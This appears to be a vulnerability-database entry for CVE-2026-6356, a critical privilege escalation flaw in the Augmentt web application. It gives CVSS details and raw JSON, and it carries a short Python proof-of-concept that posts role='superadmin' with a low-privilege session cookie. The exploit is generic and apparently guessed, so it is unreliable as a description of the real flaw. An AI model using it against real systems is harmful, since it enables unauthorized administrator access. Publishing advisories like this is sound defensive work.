Security Vulnerability Report
中文
CVE-2026-6356 CVSS 9.6 CRITICAL

CVE-2026-6356

Published: 2026-04-22 14:17:07
Last Modified: 2026-05-12 20:06:19

Description

A vulnerability in the web application allows standard users to escalate their privileges to those of a super administrator through parameter manipulation, enabling them to access and modify sensitive information.

CVSS Details

CVSS Score
9.6
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:augmentt:augmentt:*:*:*:*:*:*:*:* - VULNERABLE
未指定

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def exploit_privilege_escalation(target_url, session_cookie): """ Exploit CVE-2026-6356 by manipulating parameters. """ headers = { "Cookie": f"session={session_cookie}", "Content-Type": "application/x-www-form-urlencoded" } # Malicious payload to escalate privileges data = { "username": "victim_user", "email": "[email protected]", "role": "superadmin" # Vulnerable parameter } try: response = requests.post(target_url, headers=headers, data=data) if response.status_code == 200 and "admin" in response.text.lower(): print("[+] Privilege escalation successful!") else: print("[-] Exploit failed.") except Exception as e: print(f"Error: {e}") # Usage # exploit_privilege_escalation("http://target.com/update_profile", "low_priv_session_id")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-6356", "sourceIdentifier": "[email protected]", "published": "2026-04-22T14:17:06.720", "lastModified": "2026-05-12T20:06:18.500", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the web application allows standard users to escalate their privileges to those of a super administrator through parameter manipulation, enabling them to access and modify sensitive information."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 5.8}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1220"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:augmentt:augmentt:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025-10-02", "matchCriteriaId": "561E9514-79C5-446F-9247-84192E7DF352"}]}]}], "references": [{"url": "https://github.com/Penguinsecq/CVE-2026-6356/", "source": "[email protected]", "tags": ["Third Party Advisory", "Mitigation"]}, {"url": "https://github.com/Penguinsecq/CVE-2026-6356/", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Third Party Advisory", "Mitigation"]}]}}